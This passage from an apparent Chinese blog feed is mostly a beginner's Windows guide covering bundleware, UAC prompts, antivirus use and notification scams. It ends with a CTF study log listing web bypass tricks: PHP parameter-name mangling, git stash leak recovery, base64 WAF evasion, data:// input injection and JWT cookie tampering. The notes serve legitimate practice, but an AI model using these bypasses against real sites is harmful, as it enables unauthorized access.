第三方软件管家</h4><p>第三方的“软件管家”也能帮助我们找到所需要的软件。这些软件管家有的是电脑厂商所维护的,例如“联想软件管家”“华为软件管家”;有的是一些第三方企业所维护的,比如“360 软件管家”“腾讯软件中心”等。</p><p>一般来说,那些由电脑厂商所维护的软件管家,往往相对干净、不带“全家桶”式的捆绑(警惕360)</p><p>缺点就是软件不全或缺少更新,一般都会或多或少地提示用户安装它们的配套软件</p><h3 id="3-3-来安装文件吧"><a href="#3-3-来安装文件吧" class="headerlink" title="3.3 来安装文件吧"></a>3.3 来安装文件吧</h3><p>假设经过与各种网站的斗智斗勇,你成功地下载到了某款软件的安装包。你下载到的可能是下面三种文件中的某一种</p><h4 id="3-3-1-一个光秃秃的-exe-文件或者-msi-文件。"><a href="#3-3-1-一个光秃秃的-exe-文件或者-msi-文件。" class="headerlink" title="3.3.1 一个光秃秃的 exe 文件或者 msi 文件。"></a>3.3.1 一个光秃秃的 exe 文件或者 msi 文件。</h4><p>我们直接双击这个文件就能启动安装进程</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231153995.png" alt="image-20251126231153995"></p><h4 id="3-3-2-一个压缩包,例如-zip-或-rar-文件。"><a href="#3-3-2-一个压缩包,例如-zip-或-rar-文件。" class="headerlink" title="3.3.2 一个压缩包,例如 zip 或 rar 文件。"></a>3.3.2 一个压缩包,例如 zip 或 rar 文件。</h4><p>我们需要解压缩这个压缩包到某处,然后在解压出来的文件中找到“setup.exe”“install.exe”等名字的程序双击打开。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231220658.png" alt="image-20251126231220658"></p><h4 id="3-3-3-一个扩展名是-iso-的文件。"><a href="#3-3-3-一个扩展名是-iso-的文件。" class="headerlink" title="3.3.3 一个扩展名是 iso 的文件。"></a>3.3.3 一个扩展名是 iso 的文件。</h4><p>我们右击这个 iso 文件(镜像文件),选择【打开方式】→【文件资源管理器】,然后在弹出的新窗口中找到“setup.exe”“install.exe”等名字的程序双击打开</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231245195.png" alt="image-20251126231245195"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">至于那些“绿色版”或“便携版”软件,它们没有“安装”这一过程。</span><br><span class="line">要么是单单一个 exe文件,点开就能用;</span><br><span class="line">要么以压缩包形式出现,但是“开箱即用”</span><br></pre></td></tr></table></figure><p>启动安装器后,我们一般按提示【下一步】操作即可完成安装。但是此过程中也要留心!跨过了“高速下载器”的坎,可不要又掉进了捆绑软件的坑。<strong>有一些软件在安装程序中也会像“高速下载器”一样</strong>勾选了一些捆绑软件、浏览器主页等选项**,这些选项可能出现在安装过程中的**任何阶段,一定要注意取消勾选再进行下一步。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231426465.png" alt="image-20251126231426465"></p><p>还有,安装目录的选择,不要安装在C盘。如图中更改D盘或者点击“浏览(R)”,更改到喜欢的目录就可以</p><p>有一些软件的安装包不是“下一步”型的,而只有一个“立即安装”的按钮。一般这种情况,可以展开“自定义安装”之类的选项,然后更改软件的安装位置。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231542466.png" alt="image-20251126231542466"></p><h3 id="3-4-软件收费,破解和自由软件"><a href="#3-4-软件收费,破解和自由软件" class="headerlink" title="3.4 软件收费,破解和自由软件"></a>3.4 软件收费,破解和自由软件</h3><p>很多软件是需要购买的,包括 Windows 系统本身。常见的专业软件,从平面设计领域的Photoshop,工程领域的 Autodesk<br>家族的 AutoCAD,到开发领域的PyCharm甚至于我们每天都在用的 Word 和PowerPoint,这些软件全部都需要付费购买。右图是购买<br>正版 Photoshop(俗称的 PS)软件的页面——定价 888 元<br>一年</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127101855697.png" alt="image-20251127101855697"></p><p>我们在实际生活中,或多或少都在“没有付费而‘白嫖’这些软件”。这是因为我们使用的这些软件被“破解”了。大体上,网上流传的破解软件一般有这么两种形式:</p><p>• 一种是已经完全破解了的收费软件。这种软件已经经过修改,安装包往往也是民间自行制作的</p><p>• 另一种是使用收费软件的试用版本安装软件,再外加“破解补丁”,通过某种“打补丁”的方式来欺骗这官方原版的软件,以为用户已经购买,从而解锁全部的功能</p><p>使用破解软件终究是一件上不得台面的事情。如果你使用破解软件作为私下的个人使用、学习,软件厂商有可能不会进行追究。</p><p><strong>但是,如果你将破解软件(或者说,盗版软件)用于商业用途,那必然迟早会受到追究</strong></p><h3 id="3-5-【安全下载】到底下载了什么"><a href="#3-5-【安全下载】到底下载了什么" class="headerlink" title="3.5 【安全下载】到底下载了什么"></a>3.5 【安全下载】到底下载了什么</h3><p><strong>请不要在自己电脑上尝试运行这种来路不明的可执行程序!</strong></p><p>在上文中我们演示下载“OBS Studio”时,如果点选了【安全下载】,会得到这样一个只有 20 MB的可执行文件</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102220177.png" alt="image-20251127102220177"></p><p>若是双击运行这个文件,Windows 会弹出图 3.24 那样的窗口,询问【你要允许此应用对你的设备进行更改吗?】这个窗口称为“UAC 弹窗”,在下一章基本维护和安全防护我们会详细介绍它。</p><p>假设我们以为这个可执行文件就是 OBS Studio 的安装器,自然就放心地选择了【是】。这时,眼前自动弹出了像图 3.25 的进度条,看似正在为我们安装 OBS Studio⋯⋯</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102300205.png" alt="image-20251127102300205"></p><p>这种弹窗一般就是软件申请更改电脑的最高权限进行运行</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102337544.png" alt="image-20251127102337544"></p><p>然而,窗口的左下角提示着我们事情并不简单。这个程序并没有为我们安装 OBS Studio;相反,它安装的是“✕✕管家”,同时还会更改我们浏览器的主页为“安全导航”。在安装进程结束后,我们的桌面上多了东西:一是我们通过【通用网络下载】就能得到的那个 133 MB 的真正 OBS Studio,另一个就是刚刚安装的图标和 Microsoft Store 神似的“✕✕管家”。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102449655.png" alt="image-20251127102449655"></p><p>更危险的事情是:我们并不知道那些捆绑安装而来的软件,是否会继续静默地在我们不知情的情况下,继续安装更多我们不想要的软件。在 2022 年 3 月“3 ・ 15 晚会”整治乱象之前,曾记录过一款在类似网<br>站上下载到的“光速下载器”的行为。在它的界面上,我们可以看到右方有四个捆绑软件的复选框被默认勾选</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102601277.png" alt="image-20251127102601277"></p><p>如果我们没有取消上面的这些勾选,那会是什么结局?</p><p>以下是用虚拟机进行的操作</p><p><strong>请勿模仿!!!</strong></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102658252.png" alt="image-20251127102658252"></p><h2 id="第四章-基本维护和安全防护"><a href="#第四章-基本维护和安全防护" class="headerlink" title="第四章 基本维护和安全防护"></a>第四章 基本维护和安全防护</h2><p>本章将解决下列等问题</p><p>怎么卸载不想要的软件,为什么打开有些软件时,系统总是提示“是否运行此应用对你的电脑进行更改“,为什么电脑天天都在“更新”,杀毒软件?安全中心?电脑管家?到底用什么,网络上不干净的东西这么多,我要怎么才能“洁身自好”?</p><h3 id="4-1-软件的卸载"><a href="#4-1-软件的卸载" class="headerlink" title="4.1 软件的卸载"></a>4.1 软件的卸载</h3><p>软件的卸载是安装的逆过程,除了删除软件自身的文件之外,还会撤销一些写入系统的修改,解除一些文件关联等</p><p>因此,软件的卸载也需要通过软件自身提供的卸载工具进行,不是找到安装目录把所有文件全部删除了事,更不是直接删除桌面上的快捷方式</p><p>在 Windows 11 系统上,一般的软件卸载可以按下面的步骤进行</p><p>打开系统设置</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103107057.png" alt="image-20251127103107057"></p><p>稍等片刻以使得列表完全加载。在这个界面上,会列出电脑中安装的所有软件。找到我们不想要的软件,然后点击两次【卸载】</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103137746.png" alt="image-20251127103137746"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103144230.png" alt="image-20251127103144230"></p><p>再根据提示进行卸载操作即可</p><p><strong>但是</strong></p><p>特别注意的是,<strong>一些软件的卸载界面错综复杂,充斥有大量<br>的无关选项(例如【再想想】【我要重装】)</strong>,因此在点选时务必十分小心。甚至有些软件在卸载完成后会诱导用户装一个新的其他软件,请千万注意</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103249606.png" alt="image-20251127103249606"></p><p>有的软件可能会在卸载完成后,提示你需要重启电脑来进行一些最后的清理工作。就需要自己选择立刻重启还是稍后重启了</p><h3 id="4-2-应用的权限以及UAC弹窗"><a href="#4-2-应用的权限以及UAC弹窗" class="headerlink" title="4.2 应用的权限以及UAC弹窗"></a>4.2 应用的权限以及UAC弹窗</h3><p>这一节我们简单介绍 Windows 系统中的权限机制。一个程序在一开始启动时仅被赋予了有限的权限——它不能更改系统的一些关键设置,不能在系统中安装新的软件,不可以动一些关键数据。</p><p>对于大多数程序来说,这些权限就够用了,它们只需要安分守己地读写自己的文件,帮助用户完成工作就可以了。</p><p><strong>但是</strong>,在一些特殊的情况下,这种有限的权限对程序来说会变得不够用</p><p>对于<strong>安装包</strong>来说,安装包本身的工作就是安装新的软件,而有限的权限禁止了这种行为。<br>对于一些<strong>专业软件</strong>来说,它需要连接到一些系统级的部件才能工作,而有限的权限禁止了这种行为。<br>对于一些**“系统优化”类的软件**来说,它本身就是需要更改系统设置的,而有限的权限禁止了这种行为。</p><p>此时,程序需要提升自己的权限来完成自己的工作,称为“提权”。这种弹窗(“你要允许此应用对你的设备进行更改吗”,称为“UAC 弹窗”),则是程序在向系统申请提权时,系统对用户的提示</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103703462.png" alt="image-20251127103703462"></p><p>UAC 弹窗的意义是什么呢?想象一下这个场景:你电脑上的某个垃圾软件留下的“种子”想要给你电脑安装一套恶意软件。默认情况下,这枚“种子”没有足够的权限,因此它的计划就这样直接被粉碎了——没有提升的权限,它就没有办法进行软件安装。</p><p>这也告诉了我们一个重要的事实:如果电脑弹出了不明的 UAC 弹窗,请一律拒绝</p><h3 id="4-3-合理使用杀毒软件和安全软件"><a href="#4-3-合理使用杀毒软件和安全软件" class="headerlink" title="4.3 合理使用杀毒软件和安全软件"></a>4.3 合理使用杀毒软件和安全软件</h3><p>合理使用各种杀毒软件、安全软件(后文统称“安全软件”)可以保护你的电脑安全,然而若运用得不合理,也会极大影响我们使用电脑的体验</p><p>这里,我们不具体地推荐某一款安全软件,而是会向你介绍一些相对合理地使用这类软件的方法</p><p>国产的“360 安全卫士”“火绒安全软件”“瑞星杀毒软件”,以及国外的“卡巴斯基”“诺顿”等。同时,Windows 操作系统亦内置了一款“Windows 安全中心”(旧称“Windows Defender”),它也提供了强大的病毒防护和安全保护等功能</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103940177.png" alt="image-20251127103940177"></p><p>首先,<strong>永远不要在电脑上同时安装多于一个杀毒软件</strong></p><p>例如,安装了“360 安全卫士”,就不要再安装“火绒安全软件”等安全软件。如果安装了,不仅没有必要,它们之间还会因权限冲突而互相“攻击”(这就是养蛊)。</p><p>其次,<strong>当心“全家桶”</strong></p><p>大型软件厂商都会希望用户能选择自己的整套产品系列。以“腾讯电脑管家”为例,它会以各种方式推荐用户安装包括但不限于“QQ 浏览器”“QQ 游戏”“腾讯桌面整理”等一整套腾讯产品。</p><p>但事实上,很多时候,我们只是希望安装一款安全软件或杀毒软件来保护我们的电脑。稍不留神,这些软件就会因为某个隐秘的角落的勾勾没有去掉,而来到我们的电脑上。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127104137202.png" alt="image-20251127104137202"><br>我们安装安全软件是为了保障电脑安全,而不是希望这些软件来拖慢我们电脑的运行速度。因此,它们需要经受一些“调教”,才能更好地为我们服务。</p><p>具体地说,我们可以关闭那些无用的功能和提示,例如每次开机时的启动时间提示、桌面上碍事的“一键加速”加速球、各种“资讯”弹窗广告和“猜你喜欢”搜索框等</p><h3 id="4-4-Windows-更新——让人又爱又恨的“更新”"><a href="#4-4-Windows-更新——让人又爱又恨的“更新”" class="headerlink" title="4.4 Windows 更新——让人又爱又恨的“更新”"></a>4.4 Windows 更新——让人又爱又恨的“更新”</h3><p>Windows 一直在不断的更新之中——这里的“更新”指的不是诸如“Windows 7”“Windows 10”这样的大版本的更新,而是那时不时阻碍我们关机睡觉的“Windows 更新”。</p><p>打开系统设置,Windows10 选择【更新与安全】、Windows 11 选择【Windows 更新】,你就能看到现在可用的一些 Windows 更新以及它们的状态。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127104414176.png" alt="image-20251127104414176"></p><p>Windows 更新应该是一件人见人爱的美事,但事实并非如此。</p><p>除了阻碍我们关机睡觉之外,Windows 更新还存在一定风险——那些第一晚跑 Windows 更新,然后第二早电脑就无法启动的“翻车”事件已是屡见不鲜</p><p>但我们不至于因噎废食,而且还是基本上噎不着的情况下。事实上,那些因为 Windows 更新导致系统损坏的情况,大都是因为用户在电脑更新时手动打断,而非 Windows 更新自身的问题</p><p>因此,我们所需要做的,就是正确对待 Windows 更新,不要打断 Windows 更新。事实上,在系统更新的过程中,屏幕上就会一直提示你“请不要断开电源”。在 Windows 更新进行的过程中,我们强烈建议将电脑(包括笔记本电脑,即使它内部装有电池,即使电池是充满电的)始终连接到交流电源,同时也不要盖上笔记本的盖子,为的是让系统“不受打扰”地完成整个更新流程。</p><h3 id="4-5-远离恶意软件(流氓软件)"><a href="#4-5-远离恶意软件(流氓软件)" class="headerlink" title="4.5 远离恶意软件(流氓软件)"></a>4.5 远离恶意软件(流氓软件)</h3><p>所谓“流氓软件”,就是指那些诱导用户下载、安装其他软件,传染性强,且难以卸载的软件。</p><p>恶意软件具有传染性,即一个恶意软件可能捆绑安装 5 个恶意软件,而这 5 个则可以捆绑更多同类。最后落得的,就是一台被“玩坏了”的电脑</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127104714721.png" alt="image-20251127104714721"></p><p>如果你在电脑上发现了莫名其妙出现的软件,请卸载它们。一般情况下,对这些软件使用正常的卸载流程就能完成卸载。<strong>但特别注意卸载时的捆绑勾选</strong></p><p>下面列出了一些软件。我们发现它们很容易被恶意软件捆绑安装。如果你在不知道的情况下,发现电脑上突然被安装这些软件,就要开始警惕了——建议卸载它们并对电脑上所有安装的软件进行排查。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">“2345”家族,包括“2345 浏览器”“2345 好压”“2345 电脑管家”“2345 看图王”等一系列软件。</span><br><span class="line">“快压”“巧压”“微压”“布丁压缩”“52 好压”等一批压缩工具。</span><br><span class="line">“飞速 PDF”“小树 PDF”“熊猫 PDF”“极光 PDF”等一批 PDF 查看器。</span><br><span class="line">“新速头条”等资讯类弹窗软件。</span><br><span class="line">“小黑记事本”等小工具类软件。</span><br><span class="line">“布丁桌面”“海螺桌面”“火萤视频桌面”等“桌面”类软件。</span><br><span class="line">“手机模拟大师”“Steam 游戏助手”“Steam 管家”“傲视霸主”等游戏类软件。</span><br></pre></td></tr></table></figure><h3 id="4-6-警惕“电信诈骗”"><a href="#4-6-警惕“电信诈骗”" class="headerlink" title="4.6 警惕“电信诈骗”"></a>4.6 警惕“电信诈骗”</h3><p><strong>注意</strong></p><p>这里的电信诈骗并不是你平时听到的电信诈骗,因此请认真阅读本节内容</p><p>众所周知,现在勒索病毒横行。如果你没安装什么危险软件,但某天在上网时,电脑突然弹出了这样的“对话框”,你的第一反应是什么呢?</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127105055883.png" alt="image-20251127105055883"></p><p>尽管这个“对话框”看起来像是系统弹出的警报,但它实际上是 Chrome 浏览器发出的一个<strong>网页通知</strong></p><p>这种通知称为**“恶意浏览器通知”**,本质是一种“电信诈骗”。<strong>如果我们点击了这个通知的任何位置,就会打开一个含有恶意软件或代码的网站</strong>直接进了对方的圈套</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127105154833.png" alt="image-20251127105154833"></p><p>类似的电信诈骗还包括“你的支付账户已经泄露”“你涉嫌违法已被起诉”等等</p><p>**如何鉴别这种电信诈骗通知呢?**首先,几乎所有浏览器在网站要求发送通知时,都会明确询问用户是否接收该网站的通知,除了那些包含邮件、聊天功能的动态网站外,我们不应该随意允许其他网站发送通知。这样就能从根本上减少遭遇这种电信诈骗的可能性。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127105242706.png" alt="image-20251127105242706"></p><p>其次,当电脑上弹出任何可疑的窗口时,我们都要保持警惕。作为一个浏览器,Chrome 本身绝不会弹出类似“电脑中存在病毒”这样的警告信息。同时,当我们遇到“你的支付账户泄露”甚至是“你涉嫌违法”时,都应当仔细思考一下——银行或警方真的会用这样的方式来通告我们吗?</p><p>我们只需要学会<strong>保持冷静,理性分析,识别出嫌疑网站</strong>并将之关闭,就能有效防止自己遭受真正的损失</p><h2 id="第五章-遇到问题怎么办"><a href="#第五章-遇到问题怎么办" class="headerlink" title="第五章 遇到问题怎么办"></a>第五章 遇到问题怎么办</h2><p>本章需要解决</p><p>问题是怎么产生的?遇到问题想找别人帮助,怎么样有效地向别人提问?找不到人提问,怎样有效地上网查找解决方案?</p><h3 id="5-1-为什么电脑会时不时地出现问题"><a href="#5-1-为什么电脑会时不时地出现问题" class="headerlink" title="5.1 为什么电脑会时不时地出现问题"></a>5.1 为什么电脑会时不时地出现问题</h3><p>所谓“遇到问题”,打不开、崩溃、打开后崩溃、特定功能无法使用、无响应(俗称“卡死”)等。遇到问题的原因是十分多样的,但大体来说,可以分成三种:<strong>软件本身存在问题、软件运行的环境不合适,以及我们自己的操作不当</strong></p><h4 id="5-1-1-软件本身的问题"><a href="#5-1-1-软件本身的问题" class="headerlink" title="5.1.1 软件本身的问题"></a>5.1.1 软件本身的问题</h4><p>有时候,我们使用的软件本身就存在问题:由于软件设计者考虑不周,软件中存在设计有缺漏的地方,而这些地方恰巧被我们给碰上了,于是出现了我们意料之外的情况</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">比如,曾经某些版本的 QQ 因处理消息机制的缺陷,在接收到包含特定字符的消息后会直接崩溃;</span><br><span class="line">微信也出现过类似问题,用户在收到含</span><br><span class="line">有特定二维码的图片时,应用会无故退出。</span><br><span class="line">这些问题非普通用户所能解决,若遇到这些情况</span><br><span class="line">我们只能耐心等待软件开发商发布更新版本来修复问题。</span><br></pre></td></tr></table></figure><h4 id="5-1-2-运行环境不合适"><a href="#5-1-2-运行环境不合适" class="headerlink" title="5.1.2 运行环境不合适"></a>5.1.2 运行环境不合适</h4><p>这种情况下,软件没有问题,我们的操作也没有问题,问题出在“不合适的环境”。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">例如,某个软件A 可能需要系统版本至少是 B 但不能高过 C,而且需要电脑上安装了 D 和 E。</span><br><span class="line">一旦这一串条件中有一个不满足,软件 A 可能就无法正常工作</span><br></pre></td></tr></table></figure><p>特别地,在电脑中存在一种特殊的软件,叫做“运行库”。</p><p>这种软件自身并没有任何实际功能,但许多别的软件需要依赖它的辅助才能工作。</p><p>运行库是一种“你平常感知不到,但没有就是不行”的存在:<br>如果电脑缺少运行库,很多软件就不能正常打开,或在运行时报错</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127110102804.png" alt="image-20251127110102804"></p><h4 id="5-1-3-操作不当"><a href="#5-1-3-操作不当" class="headerlink" title="5.1.3 操作不当"></a>5.1.3 操作不当</h4><p>这种情况下,软件没有问题,而我们操作不当。例如,我们在设置软件的时候遗漏了某些关键步骤,从而造成了问题。</p><p>受限于篇幅和我们的精力,本文是不可能在一章之中总结完所有在电脑使用过程中可能遇到的问题的。</p><p>接下来,我们会介绍“提问”的方法——我们应当充分利用人脉和互联网等等资源,来帮助我们解决问题。而“提问”正是我们利用这些资源的手段</p><h3 id="5-2-提问的艺术"><a href="#5-2-提问的艺术" class="headerlink" title="5.2 提问的艺术"></a>5.2 提问的艺术</h3><p>提问并非一件轻松的事,而是一门<strong>需要技巧</strong>的艺术。有效的提问,至少要让对方了解以下几点:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">•“我”遇到了什么?</span><br><span class="line">•“我”是如何让这种状况产生的?</span><br><span class="line">•“我”想要什么?</span><br></pre></td></tr></table></figure><p>因此就是要<strong>尽量准确提供更多的信息</strong></p><p>举个例子:如果你发现自己明明将文件成功拷入了 U 盘中,但是将 U 盘插入其他电脑上时,却不能找到相应的文件。</p><p>一个好的提问是:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我确定我成功将文件拷贝到了我的 U 盘里面,但我把 U 盘插入其他电脑时,找不到这些文件。请问为什么会这样?</span><br></pre></td></tr></table></figure><p>当然,在请求他人帮助时还应该遵循基本的社交礼仪。这些东西我们不再赘述</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">问题实在解决不了又不好意思找别人的,那就来找作者吧</span><br><span class="line">Fisssssh的QQ号是3471914563()</span><br></pre></td></tr></table></figure><h3 id="5-3-善用“搜索引擎”和“网络平台”"><a href="#5-3-善用“搜索引擎”和“网络平台”" class="headerlink" title="5.3 善用“搜索引擎”和“网络平台”"></a>5.3 善用“搜索引擎”和“网络平台”</h3><p>百度、必应、搜狗这样的“搜索引擎”,以及诸如哔哩哔哩、<br>CSDN、小红书都是很好的解决问题的途径</p><h4 id="5-3-1-找准问题的关键词"><a href="#5-3-1-找准问题的关键词" class="headerlink" title="5.3.1 找准问题的关键词"></a>5.3.1 找准问题的关键词</h4><p>在搜索相关信息时,除开软件的名字,这些提示信息和错误代码就是最重要的关键词。例如,关键词就是提示信息中的出错文件 vrayvrmatmtl2014.dlt 以及错误代码 126 - 找不到指定的模块 </p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127110911486.png" alt="image-20251127110911486"></p><p>当然,发生问题的<strong>软件名称和版本同样很重要</strong>。仅凭一个错误信息,你可能会找到有同一个错误代码的来自不同软件的不同问题</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111425790.png" alt="image-20251127111425790"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111436956.png" alt="image-20251127111436956"></p><h4 id="5-3-2-用英文搜搜看"><a href="#5-3-2-用英文搜搜看" class="headerlink" title="5.3.2 用英文搜搜看"></a>5.3.2 用英文搜搜看</h4><p>得益于互联网的全球性,当我们遇到电脑问题时,还可以尝试在国际化的搜索引擎和网络平台,比如“必应”(<a href="https://cn.bing.com/%EF%BC%89%E4%B8%8A%EF%BC%8C%E7%94%A8%E8%8B%B1%E8%AF%AD%E6%90%9C%E7%B4%A2%E7%9B%B8%E5%85%B3%E7%9A%84%E8%B5%84%E6%96%99%E3%80%82%E5%BD%93%E9%97%AE%E9%A2%98%E5%87%BA%E7%8E%B0%E5%9C%A8%E5%A4%96%E5%9B%BD%E5%BC%80%E5%8F%91%E8%80%85%E6%89%80%E7%BC%96%E5%86%99%E7%9A%84%E8%BD%AF%E4%BB%B6%E4%B8%8A%E6%97%B6%EF%BC%8C%E8%BF%99%E7%A7%8D%E5%81%9A%E6%B3%95%E5%BE%80%E5%BE%80%E8%83%BD%E6%9B%B4%E5%BF%AB%E6%89%BE%E5%88%B0%E7%BB%93%E6%9E%9C">https://cn.bing.com/)上,用英语搜索相关的资料。当问题出现在外国开发者所编写的软件上时,这种做法往往能更快找到结果</a></p><h4 id="5-3-3-问问AI吧"><a href="#5-3-3-问问AI吧" class="headerlink" title="5.3.3 问问AI吧"></a>5.3.3 问问AI吧</h4><p>ai可以是一种办法,但是不提倡过度依赖</p><p>如果我们的问题并非十分常见,AI 也没怎么“见过”这样的问题,那么它就会东拼西凑、胡编乱造了。</p><h2 id="第六章-好用的快捷键"><a href="#第六章-好用的快捷键" class="headerlink" title="第六章 好用的快捷键"></a>第六章 好用的快捷键</h2><h3 id="6-1-windows键相关"><a href="#6-1-windows键相关" class="headerlink" title="6.1 windows键相关"></a>6.1 windows键相关</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">这部分内容真的很有用</span><br><span class="line">我就直接照搬了吧(绝对不是因为我懒)</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111811581.png" alt="image-20251127111811581"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111823395.png" alt="image-20251127111823395"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111834929.png" alt="image-20251127111834929"></p><h3 id="6-2-CTRL相关"><a href="#6-2-CTRL相关" class="headerlink" title="6.2 CTRL相关"></a>6.2 CTRL相关</h3><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111903439.png" alt="image-20251127111903439"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111918529.png" alt="image-20251127111918529"></p><h3 id="6-3-ALT-相关"><a href="#6-3-ALT-相关" class="headerlink" title="6.3 ALT 相关"></a>6.3 ALT 相关</h3><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111943866.png" alt="image-20251127111943866"></p><p>尝试把它们融入到你的日常使用之中吧</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">甚至Fisssssh在写这篇博客的时候用的最多的快捷键是CTRL+C&V()</span><br></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>UKY周报(完结)</title>
<link href="/2025/11/23/UKY%E5%91%A8%E6%8A%A5/"/>
<url>/2025/11/23/UKY%E5%91%A8%E6%8A%A5/</url>
<content type="html"><![CDATA[<h1 id="10-27–11-2周"><a href="#10-27–11-2周" class="headerlink" title="10.27–11.2周"></a>10.27–11.2周</h1><h3 id="本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多"><a href="#本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多" class="headerlink" title="本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多"></a>本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多</h3><p> 对之前较为模糊的知识点进行了补充,如php伪协议,cookie的组成和部分php代码绕过等<br> 1.如果直接传参名 NewStar_CTF.2024会发现并没有用。这是由 NewStar_CTF.2024 中的特殊字符 . 引起的,PHP 默认会将其解析为 NewStar_CTF_2024。可以使用 [ 字符的非正确替换漏洞。当传入的参数名中出现 [ 且之后没有 ] 时,PHP 会将 [ 替换为 _,但此之后就不会继续替换后面的特殊字符了因此,GET 传参 NewStar[CTF.2024即可<br> 2.在git泄露类型题中,开发者会使用 git stash 来暂存未提交的更改。这些更改存储在 .git/objects 中,可以被恢复。在cd到指定的目录下,恢复出的仓库中,使用 git stash list 查看暂存列表。使用 git stash apply 应用暂存,查看暂存的内容。git stash pop还原文件<br> 3.cmd里type读取文件内容,斜杠换成反斜杠,文件名加双引号<br> 4.有时候在传Base64 加密后的字符串时会报错,是因为不能带有=,会被waf,这时直接删掉结尾等号即可,后者在明文后面多加一些空格以使加密结果不带等号,若最后是+的话,我们在GET传参必须将其编码为 %2B,不然+会被视作空格<br> 5.如果有类似闯关的题目,下一关出不来的时候可以试试更新一下cookie(),如果要修改,需要拿到key之后去jwt修改后传入<br> 6.nc (Netcat),直接与服务器进行通信,不加其他的东西,逐字节发送和接收数据,有时候nc类题目中某些文字显示乱码,可以使用nc直接连接<br> 7.在题目中需要要求文件内容,如file_get_contents($text,’r’)===”welcome to the zjctf”时,可以用url写data协议直接提供内容,无需创建文件,语法data://text/plain,welcome to the zjctf</p><h3 id="本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等-补习了一下之前了解不够牢靠的部分知识点"><a href="#本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等-补习了一下之前了解不够牢靠的部分知识点" class="headerlink" title="本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等,补习了一下之前了解不够牢靠的部分知识点"></a>本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等,补习了一下之前了解不够牢靠的部分知识点</h3><p> 另外检讨一下,这周光顾打洲了,没做多少题()<br> 下周学习计划:争取复现完newstar2024所有题目,了解一下服务器监听,污染404页面等</p><h1 id="11-3–11-9周"><a 